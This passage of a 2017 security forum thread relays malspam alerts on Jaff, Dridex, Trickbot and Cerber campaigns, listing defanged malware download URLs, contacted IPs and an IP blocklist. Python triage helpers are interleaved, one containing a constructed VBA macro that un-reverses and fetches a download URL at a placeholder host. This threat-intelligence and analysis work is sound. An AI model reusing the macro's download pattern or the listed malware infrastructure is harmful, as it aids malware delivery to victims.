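    elif data.startswith(b"PK\x03\x04"):
        kind, found = "ooxml", triage_ooxml(data)
    elif data.startswith(b"\xd0\xcf\x11\xe0"):
        kind, found = "ole2", ["legacy-compound-file"]   # .doc/.xls: run olevba/oledump for macros
    else:
        kind, found = "other", []
    if suspicious_name(name):
        found.append("double-extension")
    return {"name": name, "type": kind, "findings": found, "suspicious": bool(found)}


def _make_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, b in entries.items():
            zf.writestr(n, b)
    return buf.getvalue()


# Constructed samples (not real malware): the attachment shapes seen in the posts above.
SAMPLE_DOCM = _make_zip({
    "[Content_Types].xml": b'<Types><Override PartName="/word/document.xml" '
                           b'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>',
    "word/document.xml": b"<w:document/>",
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0" + b"\x00" * 16,
})
SAMPLE_DOCX_OLE = _make_zip({
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document/>",
    "word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0" + b"\x00" * 16,
})
SAMPLE_PDF = (b"%PDF-1.5\n1 0 obj << /Type /Catalog /OpenAction 2 0 R /Names << /EmbeddedFiles 3 0 R >> >> endobj\n"
              b"4 0 obj << /Type /Filespec /F (embedded.docm) /EF << /F 5 0 R >> >> endobj\n"
              b"5 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n%%EOF")

if __name__ == "__main__":
    for name, data in (("scan.pdf", SAMPLE_PDF), ("invoice.docm", SAMPLE_DOCM),
                       ("invoice.docx", SAMPLE_DOCX_OLE), ("DECLARATION (FORM).PDF.js", b"var a=1;")):
        print(triage(name, data))
```

An embedded object or a VBA project is not proof of malice, but in a mail from an unknown sender either one is reason enough to quarantine the file and run it through a sandbox rather than open it.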

#1931 AplusWebMaster


Posted 21 May 2017 - 12:19 PM

FYI...

Fake 'blank' SPAM - doc/js attachment delivers ransomware
- https://myonlinesecu...2-0-ransomware/
21 May 2017 - "An empty/blank email with no subject pretending to come from jhavens@ mt .gov with a zip file that contains malicious word doc with an embedded OLE object delivers GlobeImposter 2.0 ransomware...
The email looks like:
From: jhavens@ mt .gov
Date: Sun 21/05/2017 13:34
Subject:  none
Attachment:  625855442530.zip
Body content:
    totally blank/empty


625855442530.zip - extracts to 1.doc - Current Virus total detections 0/56*. Payload Security**
 - drops a js file... (BR16E2~1 .JS) - VirusTotal 2/56[3] | Payload Security[4] downloads from
 http ://oldloverfg .top/admin.php?f=2 which gave yez348746.tae (VirusTotal 12/61[5]) | Payload Security[6]
While encrypting your files the js file drops this html file with instructions how to pay the ransom & retrieve your files. They are charging 1 bitcoin which is currently approx. $2000 USD...
> https://myonlinesecu...ransom-note.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495370663/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.93.208

3] https://www.virustot...sis/1495370901/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.93.208

5] https://www.virustot...sis/1495371343/

6] https://www.hybrid-a...vironmentId=100

oldloverfg .top: 47.91.93.208: https://www.virustot...08/information/
> https://www.virustot...94e46/analysis/
 



Edited by AplusWebMaster, 21 May 2017 - 12:27 PM.


#1932 AplusWebMaster


Posted 22 May 2017 - 08:12 AM

FYI...

Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecu...aff-ransomware/
22 May 2017 - "... series of emails with pdf attachments that drop a malicious macro enabled word doc is an email with the subject of 'Invoice 43412591' (random numbers) pretending to come from noreply@ random companies that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...ce-43412591.png

43412591.PDF - Current Virus total detections 13/56*. Payload Security** - drops QDLCPQKK.doc
(VirusTotal 10/58[3]) (Payload Security [4]) downloads an encrypted txt file from
 http ://primary-ls .ru/jhg6fgh  which is converted by the script to buzinat8.exe (VirusTotal 7/58[5])
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
primary-ls .ru\jhg6fgh
brotexxshferrogd .net\af\jhg6fgh
herrossoidffr6644qa .top\af\jhg6fgh
joesrv .com\jhg6fgh
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495454756/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
141.8.195.87
217.29.63.199


3] https://www.virustot...sis/1495455867/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
141.8.195.87
217.29.63.199


5] https://www.virustot...sis/1495455099/

primary-ls .ru: 141.8.195.87: https://www.virustot...87/information/
> https://www.virustot...4d7c3/analysis/
 


#1933 AplusWebMaster
Posted 24 May 2017 - 07:04 AM

FYI...

Jaff ransomware gets a makeover: fake -invoice- theme
- https://isc.sans.edu...makeover/22446/
2017-05-24 - "Since 2017-05-11, a new ransomware named 'Jaff' has been distributed through malicious spam (malspam) from the 'Necurs botnet':
> https://securityinte...malicious-spam/
This malspam uses PDF -attachments- with 'embedded Word documents' containing -malicious- macros. Victims must open the PDF attachment, -agree- to open the embedded Word document, then -enable- macros on the embedded Word document to -infect- their Windows computers:
> https://isc.sans.edu...ry-image-01.jpg
Prior to -Jaff- we've seen waves of malspam using the same PDF attachment/embedded Word doc scheme to push -Locky- ransomware. Prior to that, this type of malspam was pushing -Dridex-. With all the recent news about -WannaCry- ransomware, people might forget Jaff is an ongoing threat. Worse yet, some people might not know about it at all since its debut about 2 weeks ago. Jaff has already gotten a makeover, so an infected host looks noticeably different now... The emails: This specific wave of malspam used a -fake- invoice theme... I collected -20- emails... these emails -all- have PDF attachments, and each one contains an embedded Word document. The Word document contains malicious-macros designed to -infect- a Windows computer:
> https://isc.sans.edu...ry-image-05.jpg
The embedded Word document with malicious macros:
> https://isc.sans.edu...ry-image-06.jpg
Follow the entire infection chain, and you'll see minimal network traffic compared to other types of malware.  The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host... My infected host asked for 0.35630347 bitcoin as a ransom payment:
> https://isc.sans.edu...ry-image-14.jpg
... Much of this malspam is easy to spot among the daily deluge of spam most organizations receive. However, this PDF attachment/embedded Word doc scheme is likely an attempt to bypass spam filtering... as long as it's profitable for the criminals behind it, we'll continue to see this type of malspam..."
> http://www.malware-t...5/24/index.html
(More detail at the isc URL at the top of this post.)
 

Edited by AplusWebMaster, 24 May 2017 - 07:08 AM.

#1934 AplusWebMaster
Posted 25 May 2017 - 06:03 AM

FYI...

Fake 'receipt' SPAM - delivers Jaff ransomware
- https://myonlinesecu...ayments-emails/
25 May 2017 - "... emails with pdf attachments that drops a malicious macro enabled word doc is an email with various subjects along the line of 'receipt, payment, payment receipt' etc. (random numbers) pretending to come from donotreply@ random email addresses and companies that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...eceipt-4830.png

P4830.pdf - Current Virus total detections 12/56*. Payload Security** drops ELMIRJX.doc
(VirusTotal 4/23[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://dreamybean .de/TrfHn4 which should be converted by the script to bruhadson8.exe (unfortunately payload security is showing this as a tiny data file, so something is going wrong there and there must be an anti-analysis element to the malware). There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495710733/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.160

3] https://www.virustot...sis/1495710997/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.160

dreamybean .de: 81.169.145.160: https://www.virustot...60/information/
> https://www.virustot...61cf5/analysis/
> https://www.virustot...675f3/analysis/
___

Fake 'Reminder' SPAM - RTF file exploits deliver malware
- https://myonlinesecu...eliver-malware/
25 May 2017 - "... RTF files this time using the CVE-2017-0199* vulnerability that was fixed in April 2017** and again extra added protections by the May 2017 security updates***. If you haven’t got round to applying these essential patches yet, then go & do it NOW...
* https://nvd.nist.gov...l/CVE-2017-0199

** https://portal.msrc....y/CVE-2017-0199

*** https://portal.msrc....da-000d3a32fc99

... email with the subject of '2nd Reminder Final Demand – Notice of Legal Intention' pretending to come from creditcontrol@ bookatable .com with a malicious word doc attachment eventually delivers sharik/smoke loader after a convoluted download system involving .hta files and PowerShell...

Screenshot: https://myonlinesecu...table-email.png

294616_05152017.rtf - Current Virus total detections 28/57[1]. Payload Security[2] downloads an HTA file from
 http :// 185.162.8.231 :64646/logo.doc (VirusTotal 0/57[3]) which in turn uses powershell to download
 http :// 185.162.8.231 :64646/00001.exe (VirusTotal 48/59[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1]  https://www.virustot...sis/1494977406/

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.162.8.231: https://www.virustot...31/information/
> https://www.virustot...8fd1a/analysis/
> https://www.virustot...655f4/analysis/

3] https://www.virustot...sis/1494854940/

4] https://www.virustot...sis/1495445391/

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.141.25.27
193.104.215.58

 

Edited by AplusWebMaster, 26 May 2017 - 09:08 AM.

#1935 AplusWebMaster
Posted 27 May 2017 - 06:55 AM

FYI...

Fake 'DHL' SPAM - delivers js malware
- https://myonlinesecu...ers-ransomware/
27 May 2017 - "... an email with the subject of 'DHL Tracking Number for shipment 97 93745 186' (random numbers) pretending to come from DHL Corporation with a link in email body to download a file...
Update: Thanks to Antelox* we now have an unpacked version of the malware which is being detected as a corebot / zbot variant (VirusTotal 10/59**) ... Microsoft describes this as TrojanProxy: Win32/Malynfits.A***...
* https://twitter.com/...414436264071168
... after lots of different tweets and conversations, found this from Brad (MalwareTraffic) confirming corebot with a nice writeup by him:
> http://www.malware-t...5/26/index.html

** https://www.virustot...sis/1495880747/

*** https://www.microsof...tID=-2147245786

Screenshots(a): https://myonlinesecu...ilsystem_IE.png

(b): https://myonlinesecu...lmailsystem.png

invoice-0063827410370260857-000001870346531780753154078347.pdf.js - Current Virus total detections 5/56[1]
Payload Security[2] shows a download of various files from the same server one being auvrq.exe
(VirusTotal 20/61[3]) (Payload Security[4])... The link in email body (in the working versions) goes to
 http ://dhlmailsystem .com/documentdir/777126146374729609489374827 where you get slightly different behaviour depending on what browser you use to visit. If you use Internet Explorer or Google Chrome, you get a zip file containing a .js file. Using Firefox you get the .js file itself... you first see a page like this (b) with a message saying 'preparing download' with a countdown marker. When it reaches 0 the message becomes a -link- saying “click here to download if not started automatically” and the malware file is delivered... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
1] https://www.virustot...sis/1495836615/

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
89.223.27.247

3] https://www.virustot...sis/1495865017/

4] https://www.hybrid-a...vironmentId=100

dhlmailsystem .com: 89.223.27.247: https://www.virustot...47/information/
> https://www.virustot...72a6e/analysis/
 

Edited by AplusWebMaster, 27 May 2017 - 06:57 AM.

#1936 AplusWebMaster
Posted 30 May 2017 - 06:23 AM

FYI...

Fake 'documents' SPAM - xls attachment delivers malware
- https://myonlinesecu...nknown-malware/
30 May 2017 - "An email with the subject of 'documents' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment delivers malware... Some subjects in this malspam campaign include ...
    inv. payment
    documents


Screenshot: https://myonlinesecu...ment-austin.png

61759684.xls - Current Virus total detections 6/56*: Payload Security** wasn’t able to decode or decrypt the macro but a very quick & easy manual examination shows downloads from
 http ://cautiousvirus .com/mbtrf.exe (VirusTotal 7/60[3]) (Payload Security[4])... The macro in the xls document is trivially encoded by using reverse strings... Opening the XLS attachment gives this -fake- invoice:
> https://myonlinesecu...1759684_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496135720/

** https://www.hybrid-a...vironmentId=100

3] https://www.virustot...4f973/analysis/

4] https://www.hybrid-a...vironmentId=100

cautiousvirus .com: 54.91.240.28: https://www.virustot...28/information/
> https://www.virustot...c12c0/analysis/
___

Fake 'Notification' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
30 May 2017 - "An email with the subject of 'Notification of direct debit of fees' pretending to come from HM Land Registry but actually coming from a look-alike domain... with a malicious word doc attachment... -spoof- of a well known company, bank or public authority delivering malware...

Screenshot: https://myonlinesecu...bit-of-fees.png

Opening the word doc (in protected mode where it is safe) gives this which tries to convince you it is genuine:
> https://myonlinesecu...egistry-doc.png

apl053017_045894595.doc - Current Virus total detections 5/56*. Payload Security** shows a download from
  http ://200.7.105.13 /jpon13.exe (VirusTotal 7/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496147244/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
200.7.105.13
184.87.218.172
185.141.25.27


*** https://www.virustot...sis/1496137829/

200.7.105.13: https://www.virustot...13/information/
> https://www.virustot...137cb/analysis/
 

Edited by AplusWebMaster, 30 May 2017 - 11:58 AM.
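The reverse-string trick described for the xls macro above (and for the DHL js file earlier in this thread) is simple to undo during triage. The Python helper below is an added example, not code from the original post or from myonlinesecurity: it pulls double-quoted string literals out of a macro or script dump, reports any that become a URL once reversed, and defangs them in the "http ://host .tld" style these posts use. The macro text and the host downloader.example.com are constructed placeholders.

```python
import re

# Constructed sample of a VBA macro body in the style described in the post:
# the download URL is stored as a reversed string literal and un-reversed at
# run time. The host downloader.example.com is a placeholder, not a domain
# from the original report.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, p As String
    MsgBox "Document is protected, enable content to view"
    u = StrReverse("exe.frtbm/moc.elpmaxe.redaolnwod//:ptth")
    p = StrReverse("exe.tsal\pmet\:C")
    Call Fetch(u, p)
End Sub
'''

# Double-quoted literals (VBA and JS both use them); no multi-line literals.
STRING_LITERAL = re.compile(r'"([^"\r\n]*)"')
# A complete URL: scheme, host name or IPv4, optional port, optional path.
URL = re.compile(r'^(?:https?|ftp)://[\w.-]+(?::\d{1,5})?(?:/[^\s"]*)?$', re.I)
IPV4 = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def find_urls(source):
    """Return [(encoding, url)] for every literal that is a URL either as
    written ('plain') or only after reversal ('reversed'), in source order."""
    hits = []
    for m in STRING_LITERAL.finditer(source):
        lit = m.group(1)
        if URL.match(lit):
            hits.append(("plain", lit))
        elif URL.match(lit[::-1]):
            hits.append(("reversed", lit[::-1]))
    return hits


def defang(url):
    """Render a URL as 'http ://host .tld/path' so it cannot be clicked when
    pasted into a report. IPv4 hosts keep their dots; a port becomes ' :port'."""
    scheme, _, rest = url.partition("://")
    hostport, slash, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    if not IPV4.match(host):
        host = host.replace(".", " .")
    if port:
        host = f"{host} :{port}"
    return f"{scheme} ://{host}{slash}{path}"


def triage_report(source):
    """De-duplicated, defanged list of URLs recovered from a macro dump,
    each prefixed with how it was encoded in the source."""
    lines = []
    for encoding, url in find_urls(source):
        line = f"{encoding:8s} {defang(url)}"
        if line not in lines:
            lines.append(line)
    return lines


if __name__ == "__main__":
    for line in triage_report(SAMPLE_MACRO):
        print(line)
```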

#1937 AplusWebMaster
Posted 31 May 2017 - 06:14 AM

FYI...

Fake 'Flash Update' - malware
- https://myonlinesecu...imate-websites/
31 May 2017 - "... I was reading a page on my local newspaper... 'got a divert and a big red warning:
> https://myonlinesecu.../fake-flash.png
...  the page I was diverted to (a -fake- flash player update page) is
 https ://izaiye-interactive .net/6141452444727/01296f4851adb85de3a1ad2335c429c8/52ebc0f94a7674f6db533556c202e52f.html
... They are using a ssl prefix HTTPS but there is -no- padlock in the url to confirm this. An HTA file is automatically downloaded (or attempted to be) (VirusTotal 6/55*) (Payload Security**) - if allowed to run unfettered this hta file would download and autorun:
 https ://izaiye-interactive .net/6141452444727/1496218715917605/FlashPlayer.jse
(VirusTotal [3]) (Payload Security[4])... similar attack recently documented:
> https://myonlinesecu...-on-legit-site/
9 Apr 2017
...izaiye-interactive .net was registered yesterday on 30 May 2017 using what are obviously -fake- registrants details via PUBLICDOMAINREGISTRY .COM and hosted on 206.221.189.43 reliablesite .net ..."
* https://www.virustot...sis/1496218758/
FlashPlayer.hta

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
206.221.189.43

3] https://www.virustot...sis/1496219889/
FlashPlayer.jse

4] https://www.hybrid-a...vironmentId=100


izaiye-interactive .net: Could not find an IP address for this domain name. (May have been taken down.)

206.221.189.43: https://www.virustot...43/information/
> https://www.virustot...0607d/analysis/

> https://www.virustot...94594/analysis/
 

Edited by AplusWebMaster, 31 May 2017 - 06:52 AM.

#1938 AplusWebMaster
Posted 01 June 2017 - 08:35 AM

FYI...

Fake 'FedEx USPS UPS' SPAM - delivers Kovter and ransomware
- https://myonlinesecu...and-ransomware/
1 Jun 2017 - "... malware via the “cannot deliver your parcel notifications” or “check where your parcel is” -spoofing- FedEx, DHL, UPS, USPS etc. have changed the delivery method. The emails are still very similar to the ones we are used to seeing with this sort of subject line:
    USPS issue #06914074: unable to delivery parcel
    Parcel #006514814 shipment problem, please review
    USPS parcel #3150281 delivery problem
    Courier was not able to deliver your parcel (ID006976677, USPS)
    Parcel 05836911 delivery notification, USPS
    Delivery Status Notification

... What has changed is the -attachment- to the emails contains the malware. These now contain an HTML attachment that when opened displays a webpage on your computer that pretends to be a Microsoft Word online website and says you need to download the 'MSOffice365 Webview Plugin update', with a -blurry-image- of scrambled writing in the background with this message prominently displayed:
 'This document cannot be read in your browser. Download and install latest plugin version':
> https://i2.wp.com/my...bview.png?ssl=1

Email screenshot: https://i2.wp.com/my...ation.png?ssl=1

... 'previously described in THIS post from Mid April 2017* which shows the obfuscated/encoded nature of the files and how to decode/de-obfuscate them... At that time they linked to a remote website using the -fake- MSOffice365 scam. These malware gangs use a mix-and-match of different techniques to try to stay one step ahead of researchers and antivirus companies and gain more victims:
* https://myonlinesecu...vering-malware/
... Infection chain from 31 May 2017:
1. FedEx-Delivery-Details-ID-8AXP4QH0.doc.html attachment (VirusTotal 2/56[1]) (Payload Security[2])
2. Install-MSOffice365-WebView-Plugin-Update-0.165.11a.zip extracts to:
3. Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js (VirusTotal 8/55[3]) (Payload Security[4])
  Counter.js (VirusTotal 5/56[5]) which downloads 2 files pretending to be png (image files that are -renamed- .exe files) 1.exe currently Cerber -Ransomware- (VirusTotal 8/61[6]) (Payload Security[7]) 2.exe currently Kovter
(VirusTotal 12/60[8]) (Payload Security[9]). The 5 sites embedded in the original webview plugin.js are:
leadsfunnel360 .com
khushsingh .com
kskazan .ru
moodachainzgear .com
thegreenbook .ca
... where you get counter.js ... that when decrypted gives these 5 sites:
sharplending .com
moodachainzgear .com
buildthenewcity .biz
valdigresta .com
leadsfunnel360 .com
... Where <sitename>/counter/?1 gives the Cerber ransomware and <sitename>/counter/?2 gives Kovter... the js files try to contact the sites in the order they are listed. It then tries each combination of sitename/counter/etc. and if any site fails to respond, then moves to the next site in the list and continues to do that until the counter.js & the actual malware files are downloaded-and-run on the victim’s computer... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1496239829/
FedEx-Delivery-Details-ID-8AXP4QH0.doc.html

2] https://www.hybrid-a...vironmentId=100

3] https://www.virustot...sis/1496240000/
Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts (1279)

5] https://www.virustot...sis/1496296754/
COUNTER[1].js

6] https://www.virustot...sis/1496240581/
60[1].png

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts (1089)

8] https://www.virustot...sis/1496240649/
11.exe

9] https://www.hybrid-a...vironmentId=100
Contacted Hosts (413)

 

Edited by AplusWebMaster, 01 June 2017 - 09:29 AM.

#1939 AplusWebMaster
Posted 02 June 2017 - 06:47 AM

FYI...

Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
2 Jun 2017 - "... emails with -pdf- attachments that drops a malicious macro enabled word doc is an email with the subject of 'Invoice INV-0790' (random numbers) pretending to come from random names and email address that delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...ce-inv-0790.png

Invoice INV-0790.pdf - Current Virus total detections 12/56*. Payload Security** drops 231GEOHJWMQN935.docm
(VirusTotal 10/59[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://lanphuong .vn\hH60bd which is converted by the script to miniramon8.exe
(VirusTotal 8/62[5]) (Payload Security[6]).
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
lanphuong .vn\hH60bd
newserniggrofg .net\af\hH60bd
resevesssetornument .com\af\hH60bd
mountmary .ca\hH60bd
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496395482/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
112.213.85.78
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


3] https://www.virustot...sis/1496395712/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
112.213.85.78
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


5] https://www.virustot...sis/1496396221/

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


lanphuong .vn: 112.213.85.78: https://www.virustot...78/information/
> https://www.virustot...0a0ad/analysis/
___

Fake 'Message' SPAM - delivers Dridex
- https://myonlinesecu...-email-address/
2 Jun 2017 - "... emails with -pdf- attachments that drops a malicious macro enabled word doc is a blank/empty email with the subject of 'Message from KM_C224e' pretending to come from a -copier- at your email address that delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...om-KM_C224e.png

The payload & websites are exactly the -same- as described in today’s earlier Dridex malspam run using fake invoices*..."
* https://myonlinesecu...banking-trojan/
2 Jun 2017
 

Edited by AplusWebMaster, 02 June 2017 - 08:16 AM.

#1940 AplusWebMaster
Posted 05 June 2017 - 07:14 AM

FYI...

Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
5 Jun 2017 - "... emails with random numbered -pdf- attachments that drops a malicious macro enabled word doc is an email with the subject of 'Invoice' pretending to come from a random first name Holmes at random email addresses but the body of the email imitates John Miller Ltd...

Screenshot: https://myonlinesecu...ler_-Holmes.png

... the PDF actually having some content that makes it almost look real:
> https://myonlinesecu..._129303_pdf.png

A4 Inv_Crd 21297.pdf - Current Virus total detections 9/56*. Payload Security**
 drops Invoice_129302.docm (VirusTotal 8/59[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://spaceonline .in\8yfh4gfff which is converted by the script to miniramon8.exe (VirusTotal 13/61[5])...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496654801/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
111.118.212.86
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


3] https://www.virustot...sis/1496654938/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
111.118.212.86
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


5] https://www.virustot...85e97/analysis/

spaceonline .in: 111.118.212.86: https://www.virustot...86/information/
> https://www.virustot...c915b/analysis/
___

- http://blog.dynamoo....ed-invoice.html
5 Jun 2017 - "This spam pretends to come from John Miller Ltd (but doesn't) and comes with a malicious payload. The domain mentioned in the email does -not- match the company being spoofed, and varies from message to message.

Screenshot: https://3.bp.blogspo...john-miller.png

The attachment currently has a detection rate of about 9/56*. As is common with some recent attacks, the PDF actually contains an embedded Microsoft Office document. Hybrid Analysis** shows the malicious file downloading a component from cartus-imprimanta .ro/8yfh4gfff (176.126.200.56 - HostVision SRL, Romania) although other -variants- possibly exist. A file is dropped (in the HA report called miniramon8.exe) at a detection rate of 11/61***. According to the Hybrid Analysis report, that attempts to communicate with the following IPs:
192.48.88.167 (Tocici LLC, US)
89.110.157.78 (netclusive GmbH, Germany)
85.214.126.182 (Strato AG, Germany)
46.101.154.177 (Digital Ocean, Germany)
The payload is not clear at this time, but it will be nothing good.
Recommended blocklist:
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177"
* https://virustotal.c...sis/1496654625/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
176.126.200.56
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


*** https://virustotal.c...sis/1496655625/

cartus-imprimanta .ro: 176.126.200.56: https://www.virustot...56/information/
> https://www.virustot...70dc3/analysis/
___

'WakeMed' Phish
REAL 'WakeMed': http://www.wakemed.org/contact-us
Raleigh, NC 27610

FAKE/Phish: https://myonlinesecu...pt-at-phishing/
5 June 2017

Screenshot: https://myonlinesecu...ERVICE-DESK.png

"... If you follow the link you see a very badly designed webpage, complete with spelling errors, obviously created by a non-English speaker, looking like this:
(from: http ://itupdat.tripod .com/)
> https://myonlinesecu...ripod_phish.png

... the spam -email- is a -compromised- (may be spoofed) Canadian Nova Scotia Department of Education address... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

itupdat.tripod .com: 209.202.252.101: https://www.virustot...01/information/
> https://www.virustot...0ddb7/analysis/

ccrsb .ca: 142.227.247.226: https://www.virustot...26/information/
___

Police dismantle crime network - online payment SCAMS
- https://www.helpnets...-crime-network/
June 5, 2017 - "The Polish National Police, working in close cooperation with its law enforcement counterparts in Croatia, Germany, Romania and Sweden, alongside Europol’s European Cybercrime Centre (EC3), have smashed a Polish organised crime network suspected of online payment scams and money laundering... Operation MOTO on 29-31 May 2017 resulted in 9 arrests including the criminal network’s masterminds, as well as 25 house searches in Poland. The perpetrators were advertising online cars as well as construction or agricultural machinery/vehicles, but never delivered the advertised goods to interested buyers, despite having received advance fee payments..."
 

Edited by AplusWebMaster, 05 June 2017 - 01:46 PM.

#1941 AplusWebMaster
Posted 07 June 2017 - 05:08 AM

FYI...

Fake 'Invoice' SPAM - pdf attachments drop malware
- https://myonlinesecu...anking-malware/
7 Jun 2017 - "... emails with -pdf- attachments that drop a malicious macro enabled word doc... email with the subject of '32_Invoice_2220' (random numbers at start and end of invoice) pretending to come from random names and email addresses that delivers what looks like either Dridex or Emotet banking malware...

Screenshot: https://myonlinesecu...aff_invoice.png

001_8951.pdf - Current Virus total detections 12/54*: Payload Security** drops 690UICEBVOFF735.docm
... downloads an encrypted txt file from
 http ://micolon .de/7gyb3ds which is converted by the script to krivokor8.exe
(VirusTotal 8/61[3]) (Payload Security[4])...
* https://www.virustot...sis/1496825964/
001_0673.pdf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.167
37.120.182.208
194.87.234.99
192.157.238.15
185.23.113.100
178.33.146.207


3] https://www.virustot...3d40c/analysis/
krivokor8 - Copy.exe

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.218.206.69

The -macros- in this example are very different to the ones we have previously seen. There are 3 hardcoded (slightly obfuscated) download sites in -each- macro (The first I examined had these 3):
micolon .de/7gyb3ds
essentialnulidtro .com/af/7gyb3ds
suskunst .dk/7gyb3ds
Thanks to Racco42[5], -other- download sites found include:
5] https://twitter.com/...384811301834752
...
... Malware IPs: https://pastebin.com/arUi7B1H
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Fake blank/empty SPAM - delivers Trickbot
- https://myonlinesecu...-delivery-lure/
7 Jun 2017 - "... an email with a blank/empty subject as well as a completely empty email body pretending to come from random senders with a malicious word doc attachment delivers Trickbot... One of the email looks like:
From: random senders
Date: Wed 07/06/2017 13:15
Subject: none
Attachment: SCAN_0636.doc


Body content: Totally Blank/Empty

SCAN_0636.doc - Current Virus total detections 12/59*. Payload Security** downloads an encrypted txt file from
 http ://beursgays .com\7gyb3ds
Still delivering the same krivokor8.exe (VirusTotal 9/61[3]) (Payload Security[4]) which is Trickbot banking Trojan.
So far we have found these additional sites:
 essentialnulidtro .com\af\7gyb3ds
 martos .pt\7gyb3ds
 castvinyl .ru\7gyb3ds ...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496837651/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
178.237.37.40
50.19.227.215
185.86.150.185


3] https://www.virustot...3d40c/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.218.206.69

beursgays .com: 178.237.37.40: https://www.virustot...40/information/
> https://www.virustot...3e378/analysis/

essentialnulidtro .com: 119.28.85.128: https://www.virustot...28/information/
> https://www.virustot...21088/analysis/

martos .pt: 91.198.47.86: https://www.virustot...86/information/
> https://www.virustot...2aefd/analysis/

castvinyl .ru: 89.111.176.244: https://www.virustot...44/information/
> https://www.virustot...f690f/analysis/
___

Fake 'Message' SPAM - delivers ransomware
- https://myonlinesecu...ber-ransomware/
7 Jun 2017 - "... using 'Message from KM_C224e'... using the same subject and email template but with a zip attachment containing an .exe file... pretends to come from copier @ your-own-email-domain... Confirmed: this is JAFF ransomware...

Screenshot: https://myonlinesecu...zip-version.png

SKM_C224e03215953284.zip: Extracts to: SKM_C224e9930.exe - Current Virus total detections 12/61*
Payload Security** | MALWR***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496843658/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
52.15.162.35

*** https://malwr.com/an...GQxZTI4NzZlOTM/
Hosts
